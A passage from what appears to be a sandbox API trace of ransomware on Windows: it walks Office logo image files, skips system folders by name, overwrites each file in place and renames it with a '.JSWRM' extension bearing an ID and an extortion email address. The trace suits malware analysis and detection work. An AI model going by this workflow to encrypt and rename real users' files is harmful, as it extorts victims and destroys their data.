lpWideCharStr="MsPubLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x241178, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 28 [0133.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0133.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-180.png", cchWideChar=28, lpMultiByteStr=0x2410d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 28 [0133.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.284] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.285] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2434) returned 1 [0133.285] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.285] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x980, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x980, lpOverlapped=0x0) returned 1 [0133.287] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.287] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x980, lpOverlapped=0x0) returned 1 [0133.287] CloseHandle (hObject=0x238) returned 1 [0133.287] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.288] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6b16ff, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6b16ff, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6d794e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x66c, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="MsPubLogoSmall.scale-80.png", cAlternateFileName="MSC667~1.PNG")) returned 1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2=".") returned 1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="..") returned 1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="...") returned 1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="windows") returned -1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="recovery") returned -1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="perflogs") returned -1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="system volume information") returned -1 [0133.288] lstrcmpiW (lpString1="MsPubLogoSmall.scale-80.png", lpString2="msocache") returned 1 [0133.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0133.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x2410d8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 27 [0133.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0133.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MsPubLogoSmall.scale-80.png", cchWideChar=27, lpMultiByteStr=0x241100, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MsPubLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 27 [0133.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.289] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.289] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.289] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1644) returned 1 [0133.289] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.289] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x660, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x660, lpOverlapped=0x0) returned 1 [0133.291] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.291] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x660, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x660, lpOverlapped=0x0) returned 1 [0133.291] CloseHandle (hObject=0x238) returned 1 [0133.291] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\MsPubLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\mspublogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.292] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6fdbb6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6fdbb6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x89b, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.contrast-black_scale-100.png", cAlternateFileName="ONAFA7~1.PNG")) returned 1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="perflogs") returned -1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.292] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-100.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 40 [0133.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.293] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2203) returned 1 [0133.293] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.293] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x890, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x890, lpOverlapped=0x0) returned 1 [0133.295] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.295] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x890, lpOverlapped=0x0) returned 1 [0133.296] CloseHandle (hObject=0x238) returned 1 [0133.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.297] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac2, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.contrast-black_scale-140.png", cAlternateFileName="ON5141~1.PNG")) returned 1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="perflogs") returned -1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.297] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.298] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0133.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-140.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 40 [0133.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.298] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2754) returned 1 [0133.299] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.299] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xac0, lpOverlapped=0x0) returned 1 [0133.300] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.300] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xac0, lpOverlapped=0x0) returned 1 [0133.300] CloseHandle (hObject=0x238) returned 1 [0133.301] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.302] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xda4, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.contrast-black_scale-180.png", cAlternateFileName="ON04BC~1.PNG")) returned 1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="perflogs") returned -1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.302] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22cdc8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0133.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteLogo.contrast-black_scale-180.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 40 [0133.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.302] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.303] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3492) returned 1 [0133.303] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.303] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xda0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xda0, lpOverlapped=0x0) returned 1 [0133.340] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.341] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xda0, lpOverlapped=0x0) returned 1 [0133.341] CloseHandle (hObject=0x238) returned 1 [0133.341] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OneNoteLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\onenotelogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.343] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a6d794e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a6d794e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a6fdbb6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7f5, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="OneNoteLogo.contrast-black_scale-80.png", cAlternateFileName="ONBA8A~1.PNG")) returned 1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="perflogs") returned -1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.343] lstrcmpiW (lpString1="OneNoteLogo.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.343] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 